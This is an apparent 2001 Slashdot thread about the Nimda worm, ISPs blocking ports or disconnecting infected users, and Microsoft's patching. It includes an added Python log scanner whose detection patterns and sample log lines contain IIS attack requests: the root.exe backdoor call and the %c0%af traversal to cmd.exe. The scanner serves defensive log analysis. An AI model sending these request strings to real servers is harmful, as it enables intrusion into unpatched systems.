I'm old enough to remember when discussions on Slashdot were well informed.
(It's clear that they haven't completely shut down the ports, since I'm still able to connect to my server, but I've only got errors from a few unique IP addresses today. There's no way that many people could have cleaned up their own systems since yesterday...)
Your Servant, B. Baggins
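The PHP logger posted earlier in the thread and this comment's count of distinct probing addresses are the same check done two ways. As an added example (not code from any poster), here is a Python scanner that reads Apache common-format access-log lines, flags requests matching the Nimda probe patterns quoted in this thread (the root.exe backdoor, the %c0%af traversal and cmd.exe), and counts unique source addresses per day, which is the figure the comment above compares from one day to the next. The log lines are constructed sample data using documentation address ranges.

```python
import re
from collections import defaultdict
from datetime import datetime

# Request substrings this thread associates with Nimda's IIS probes:
# the root.exe backdoor left by Code Red II, the Unicode ("%c0%af")
# directory-traversal path to cmd.exe, and cmd.exe itself.
NIMDA_PATTERNS = (
    re.compile(r"/scripts/root\.exe", re.I),
    re.compile(r"%c0%af", re.I),
    re.compile(r"/winnt/system32/cmd\.exe", re.I),
)

# Apache "common" log format: host ident user [time] "request" status bytes
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+'
)


def is_nimda_probe(request: str) -> bool:
    """True when the request line matches one of the probe signatures."""
    return any(p.search(request) for p in NIMDA_PATTERNS)


def parse_line(line: str):
    """Return (ip, ISO date, request) for a well-formed log line, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    # Apache timestamp, e.g. 19/Sep/2001:10:15:32 -0400; keep only the date.
    ts = datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts.date().isoformat(), m.group("request")


def probing_hosts_per_day(lines):
    """Map each day to the set of distinct source addresses that sent probes."""
    per_day = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:  # malformed or non-log line: skip, do not crash
            continue
        ip, day, request = parsed
        if is_nimda_probe(request):
            per_day[day].add(ip)
    return dict(per_day)


def summarize(lines):
    """Return {day: number of unique probing hosts} for the given log lines."""
    return {day: len(ips) for day, ips in probing_hosts_per_day(lines).items()}


# Constructed sample log, not real traffic. Source addresses are drawn from
# the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2001:09:01:12 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 207
192.0.2.10 - - [18/Sep/2001:09:01:13 -0400] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 207
198.51.100.7 - - [18/Sep/2001:09:02:40 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 207
203.0.113.5 - - [18/Sep/2001:11:30:01 -0400] "GET /index.html HTTP/1.0" 200 1043
198.51.100.7 - - [19/Sep/2001:08:15:00 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 207
203.0.113.5 - - [19/Sep/2001:08:16:22 -0400] "GET /images/logo.gif HTTP/1.0" 200 512
this line is not a log entry at all
"""

if __name__ == "__main__":
    for day, count in sorted(summarize(SAMPLE_LOG.splitlines()).items()):
        print(f"{day}: {count} unique probing host(s)")
```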
How does that jibe with the following, from http://help.broadband.att.com/legal/violations.jsp ?
Interestingly, I can find no such clause forbidding redistribution in the leasing agreement that you quote (only a clause prohibiting *selling* services). But clearly they believe that running any kind of server is a violation. From http://help.broadband.att.com/faq.jsp?content_id=416&category_id=34:
That seems pretty clear to me! Perhaps the leasing agreement isn't the only agreement you're subject to (I notice they also have links to an "acceptable use policy", but they seem not to be accessible by non-AT&T users). In any case, I wouldn't want to have to be in the position of having to argue the point with them after they'd blocked port 80. If you want to run servers, go elsewhere if you have the choice. If that choice isn't exercised, it may eventually disappear....
--J. Bruce Fields
People have commented that without an Internet connection, the problem will be hard to fix. Why? Because Microsoft requires infected and at-risk systems be on the Internet to download patches. If Microsoft had done the respectable thing and mailed out patch CDs to registered users (and maybe even given them away at computer stores), much of this could have been avoided.
Try changing your zip code to the same city as some of us who are telling you that we're allowed to run servers - the help pages change based on where your service is coming from.
Try 32225 - Jacksonville, Florida. Formerly MediaOne Roadrunner. Then go look at the service agreements.
We're allowed to run servers, we just can't have AT&T support them.
This space for rent. Call 1-800-STEAK4U
Heh...it's definitely on the list of "things I'm gonna do on a weekend when I'm bored and don't feel like playing games". Just like building a PC for mp3 stereo/DivX player functionality, and getting a few more serial terminals (bathroom, bedroom, and kitchen need terminals, damnit! Screw "internet appliances" and crap like that...I want to always be less than 5 feet from a green-screen!).
That's right, I have no life....why do you ask?
"That's Tron. He fights for the Users."
I can see home users not knowing enough about computers to take the steps to protect themselves. Personally I think that Internet usage should be licensed and anyone unwilling or unable to qualify for the license should be relegated to AOL. Anyone claiming this view is elitist is obviously a candidate for such a fate.
And as far as the companies that post enormously inflated figures on how much these various E-Mail worms will cost them, I say they should go to their network security people and their CIO and ask them hard questions about why the necessary steps were not taken to prevent the outbreak inside the company in the first place. The exploit that Code Red used, for instance, had a patch out for ages before the worm started spreading. Of course, the reason the infrastructure monkeys don't do it is because a lot of them are idiots and the ones who aren't are so overwhelmed that they can barely keep up with other work demands. The CIO makes the decisions on how much staff is necessary to keep the networks not only running smoothly but safely and securely too, and if he's not doing his job well, his bonus and possibly his job should be impacted.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
@HOME does not allow people to run web, mail, DNS, NNTP, etc. servers according to their TOS contract.
Cox@Home in no.la.us has decided to just shut off ports 25 and 80, which is a Good Thing. That means that people who are unaware that they are running IIS on their winbox will have it disabled, and people who know they are running a webserver (against @HOME's TOS :) can just switch http over to port 81 or something.
I've been running my family home page off of @HOME for over a year, and they haven't bothered me about it, but I'm sure they would give me some grief if it was generating a lot of traffic.
/*drunk.. fix later*/
The simple solution is: Talk to customer support.
From what I hear with my ISP that does exactly this measure (dropping you offline after a warning, and you're infected), you talk to Customer Service, who let you back on, just to get the patch, you patch, and they check to see you disinfected (you can do rough disinfect pre patch).
That's what Customer Service are for. To let you back online, so you can keep paying them. But they don't want a few people ruining the show for everyone.
Malk
Relying on host features to prevent denial of service attacks is pointless - ISPs need to pull their finger out, and start doing filters that prevent source address spoofing. This will address the issue of raw sockets allowing such spoofing once and for all, across all OS types. Ever since it became possible to put a PC on the Internet, it has been a waste of time trying to rely on host security to prevent undesirable network behaviour.
The IIS exploit that Nimda used was reported in October of 2000 in MS00-078... Web Server Folder Traversal.
But it references actually having already been patched by MS00-057... File Permission Canonization which was released in August of 2000.
Both of these have been included in various other hotfixes moving forward, including rollup hotfixes thrown together to battle Code Red.
The other IIS exploit was really just to use holes which had been punched in from Code Red. This means that if CR had infected a machine, that machine would need to have been properly cleaned up.
The other vector this virus used was a problem with invalid interpretation of Mime headers, reported in MS01-020 in March of 2001. This was corrected with SP2 of both IE5.01 and IE5.5, as well as IE6.0.
Yes these exploits had been patched many months ago.
No you did not have to subscribe to anything to obtain these patches, they are all available for Free off of Microsoft's website.
http://www.microsoft.com/security
/. tends to have difficulty representing the truth. Personally I blame it on a shortage of anti-depressant medications in Michigan.
Or rather, 0.1% is the third or fourth attempt at copying "Hello World" out of "Java for Dummies", after 20 minutes of looking at (s, "s and ;s.
Eric
"Seven Deadly Sins? I thought it was a to-do list!"
I don't see what the fuss is all about. I patched my system when prompted to, I updated my Norton antivirus when prompted to, I went on some websites which had the virus, it detected it, I've received e-mails with it, it detected it.
:)
I'm not a rocket scientist, I've acted like any Net user should do. Patching and antivirus are something common in the Windows world; bitch as much as you want, if you've done your homework properly, chances are you didn't get affected by this. Of COURSE some will (people that got it before, let's say, the Norton update was available), but if everybody had done his job right, the threat would have been contained and not as big as it is right now.
Paying for norton antivirus? well last time I checked it was about 30$ for an OEM copy, that's nothing compared to paying 40$ for a C00l K-RaD cooler or overpriced pentium IV is it? If you're able to spend 1000$ on a box, spending 30$ for protecting it is an investment.
What I find unacceptable is people that, one week after code red was announced, were still infected and probing my servers. That's irresponsible, and I agree with shutting them down until they fix the problem. Please don't bullshit with freedom and similar crap related issues, if your freedom means slowing down or crashing other people's net experience, it's called BEING SELF-CENTERED and irresponsible. ISP have a responsibility to ensure that the maximum of their userbase aren't affected by any crisis, a complete shutdown may be a bit drastic, but if it's the way to educate people (since it seems that people didn't learn from code red) well, I'm all for it.
I guess I'll be modded as a troll or flamebait, but I do think I'm making sense
--- Metamoderating abusive downgraders since my 300th post.
I see NO difference here. They may not know why they can't connect. They call the ISP help line. The notes in the account indicate it was cut off for Nimda Infection.
"What do I do?"
"Take your computer to any of the dozens of computer repair/service/consultant places in your local phone book. Tell them you have a Nimda Infection and give them this phone number if they have questions."
There is a cost associated with running a computer, either you pay it with time learning how to run/configure/maintain it, or you pay it with dollars paying the consultant to take care of it for you.
DeanT
FYI IE 5.0 SP1 solved the problem.
I've tested on several machines here running 5.0 SP1 and they had no problems at all with the page.
If God gave us curiosity
From the Slashdot story, "... Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS."
I think this is exactly the problem. That's why Windows 2000 was reportedly shipped with 63,000 action items still unfinished. Microsoft knows that, once they deliver one good operating system, most people will never buy another. They want to make sure that they never finish the job.
Forcing users to pay for subscriptions would allow Microsoft to make money every year even if it did no more work on the OS. That seems to be the goal: money for nothing.
Microsoft is a very adversarial company, in my opinion. They are not good citizens.
A good partial resolution of the US DOJ vs. Microsoft antitrust case would be to prohibit secret file formats. Then there could be competition again. At present, if a big customer upgrades to a new version of Microsoft Office, and sends out files incompatible with previous versions, all people who receive the files are forced to upgrade. Companies don't want to go to a good customer and ask them to re-send a document in a former format.
What Should be the Response to Violence?
Bush's education improvements were
True. But it shows a particular attitude, doesn't it? Ship on schedule, not when the product is finished.
My DSL ISP just filtered all incoming HTTP traffic to all their customers. My personal WWW server became inaccessible. My Linux box is NOT infected and I do not see why I have to suffer because they are trying to protect some stupid Windows users. And this is a "business" DSL account!
They can please the fifty percent of the people who want it when it was promised, or they can please the other fifty percent who want it 'when it's done.' Or they can pull an Ion STORM and live off of the hype for four full years, then sink within six months.
Vintage computer games and RPG books available. Email me if you're interested.
Relying on host features to prevent denial of service attacks is pointless
Relying on ANY single point of security is pointless.
ISPs need to pull their finger out, and start doing filters that prevent source address spoofing.
Nobody said they didn't. I did when I ran an ISP.
But until the laws of every country in the world mandate this, upon penalty of death, it's not going to happen.
Instead of convincing 200 countries to make a change, don't you think it'd be more productive to try to convince a handful of people to make a change that increases security somewhat on 95% of the PCs connected to the Internet? Especially IN ADDITION to convincing ISPs to do their jobs?
When I got my DSL line, I received a big hurkin box full of stuff. (Including a very nice Intel NIC.)
If they are concerned about infected servers, they should work a deal with Linksys or some other manufacturer and ship a firewall box with each install.
They are very simple to set up and keep out the probes to all the ports that Windows leaves open. If people want to run web servers, they have to specifically enable specific ports.
It won't stop the e-mail viruses, but it is a start...
"Trademarks are the heraldry of the new feudalism."
We are clearly in a time when we are increasingly vulnerable. If we are not capable of stopping these types of attacks in their tracks, we can count on remaining vulnerable not just to the mafia boys of the world, but to nations and organizations who are deadly intent on causing as much destruction as possible.
1) ISPs should allow any and all traffic - they're just service providers. Great idea - and the highway system (ok, let's say toll roads) should let folks drive down them with an M1 Abrams tank. Armed. Fact is, service providers must, for both idealistic ethical and pragmatic financial reasons, choose the greater good of the majority of users - not the imagined rights of any individual to screw it up for everyone else.
2) Cutting users off from the Internet seems a bit harsh. Bull. Having suffered through the Code Red degradation of service, I can guarantee that is a trivial harshness that is necessary. I turned over my scan lists to @home and they politely replied that they were "notifying" the offenders. If these guys were in charge of quarantining an Ebola outbreak we'd all be barfing blood. Blanket port blocking, on the other hand, wrongly damages and restricts responsible users.
3) M$ "fixes" their problems. More pure bull. M$ historically doesn't "fix" problems - they deny, accuse the evil virus writers, then finally stick bandaids on gaping holes - after suggesting that the users employ unworkable workarounds. The real problems are deeply rooted in fundamental design flaws and cannot truly be fixed without a major overhaul - oh yeah, I guess that would be Windows ME.
If enough users who purchase and use defective software get blown off the internet, then maybe, just maybe we'll see fewer ignorant (not stupid - there's a difference) users blundering down the electronic highways in battle tanks just cause some slick salesman in Seattle told them tanks made great family cars.
> However you can only use Windows Update if you have a legally purchased copy of Windows...
Uhm, wrong. Perhaps that _might_ be the case with non-Corporate copies of Windows XP, but that's certainly not the case with any other version of Windows. If Windows is installed (and you require a CD Key to install it), then that's all you need.
For the past 48 hours my XO DSL (formerly concentric) has been blocking port 80 traffic. Originally all port 80 traffic was blocked, and on and off parts have been open, but now outbound is open. But my hosted sites here are down, and have been for nearly 48 hours. Here is a copy of the email I got from xo:
As a consequence of the increased traffic generated by NIMDA worm, XO will continue to use filters for Internet traffic on some of our networks. We will continue to monitor these filters and remove them from the network as the traffic decreases. In addition, we will continue to investigate alternative options to filter this traffic.

The filters we have recently implemented block the most common methods used by the worm to spread via the UDP port 69 (used for TFTP or Trivial File Transfer Protocol) and inbound TCP traffic on port 80 (used for HTTP or Hyper Text Transfer Protocol). This filter set may prevent others from accessing sites on your web servers. These filters will remain in place until the attacks have been brought under control.

XO customers are encouraged to secure their systems. If the worm has affected a machine on your network, it must be removed from the network and reformatted. You can find more information on these attacks and available remedies from the following links, using an alternate Internet connection if necessary:
Note that even if I was never infected (I wasn't -- mainly I run FreeBSD, and my win32 machines were patched months ago), I have no option to have them turn it on by telling them I'm clean. I confirmed this on the phone, there's nothing I can do. I am going to call and bitch and make them refund part of my monthly fee. This is bullshit.
I can see blocking people who appear to be infected, but blocking everybody? Ick.
-Justin
Can you read?
The comment (indeed, the few comments previous in the thread) clearly referred to NT/2K SERVER, not workstation. Heck, I run W2K workstation at home...it is a fuckload more stable than anything in the 9x series.
And I don't run Linux on any of my boxes...OpenBSD and FreeBSD are much better suited to my needs for servers, routers, etc. For a desktop, W2K workstation has everything else beat currently, especially seeing as I like to play more than the select few games available on Linux.
"That's Tron. He fights for the Users."
When ISPs get into the habit of deciding what content is OK and what content isn't, we are getting into real trouble. And I think they may be exposing themselves to legal liability as well.
It's true what you said. But the 63,000 action items speaks something that I find true.
In my opinion, a rich company like Microsoft could do more to assure the quality of its products.
Microsoft Word 2000, for example, is VERY quirky. Also, even after all these versions, it still doesn't allow on-screen kerning. That's not a good record for a very expensive product of which Microsoft has sold millions of copies.
Though I agree with you in principle... I think outlawing web servers or other services is stupid...
If you are infected with NIMDA, then your computer, your connection, is attempting to break into hundreds or thousands of other computers from your connection. I'd shut you off as well; your computer is engaging in otherwise illegal behavior, whether you know about it or not.
If you know about it, then you are responsible.
If you don't, you should.
I think that all around, this is the most effective tactic that can be done.
It's fair - if you're not a problem, you don't get affected. If you are a problem, you're neutralized. No collateral damage.
It works for novice and techie alike - no matter what your experience level, you WILL notice your connection no longer works! And all customers know how to call in to support... and then they can get help at an appropriate skill level, along with some well-deserved admonishment.
It's effective - you don't leave people with really nasty infectious diseases out in the general population, you isolate them. You don't ignore the drunk driver, you slam the sucker in the drunk tank overnight. No, computers do not compare to real lives - but neither does losing your ability to websurf compare to losing your car for a year! In relative terms, it's about equivalent.
It also keeps the infected systems from attacking their neighbors - egress filtering, etc, won't do diddly at the local segment, and I can assure you the routers that cablemodems or DSL modems hook into do NOT have enough brains to act as firewalls as well.
There is indeed a problem with getting patches after... perhaps the best implementation of the cutoff would be to reassign their IP into a quarantine range, which can only access the ISP's fixit site (or other people in the quarantine range).
How you can prove you're properly patched, though, is a tough one. I removed several people from an email list I run because they had Sircam, and I simply had to trust them when they said they'd fixed their systems....
I agree with you completely on the age issue. If someone is going to put a computer on the Internet, it is incumbent upon them to know something about how that computer and the Internet work. They don't have to have a technician's level of knowledge, but they do need to know enough to keep their machine working properly and to fix simple problems.
In many cases, the elderly person didn't get on the Net themselves; a younger person, often a son, daughter, grandson, or granddaughter, got them online. In that case, the person who set things up bears the responsibility of keeping things running smoothly, at least for a time. I can recall an incident at work where an elderly lady called a co-worker of mine with technical problems. Not only had she reached the wrong department, but in talking with her, he found that she thought that we were responsible for turning her computer on and off for her. She didn't have a clue that there was a button that she needed to push to turn it on. She explained that her kids had gotten the computer for her and set up an Internet account, but she said they never showed her how to use it. If anyone thinks this is uncommon, they should go to work for an ISP's tech support department for a week or two. Point is, whoever convinced these folks they need to be online needs to follow through with the proper training and support.
And I agree completely with the ISPs who are booting infected users. These computers are actively looking for other machines to infect, and they're degrading service for everyone else. As soon as the users patch their computers, they can get back online. As for losing connectivity before they can get the patch, well, they'll learn a little resourcefulness, and they'll learn not to put these things off next time. And if they can't or won't patch, then they don't need to be online in the first place.
That light you see at the end of the tunnel might be from an oncoming train.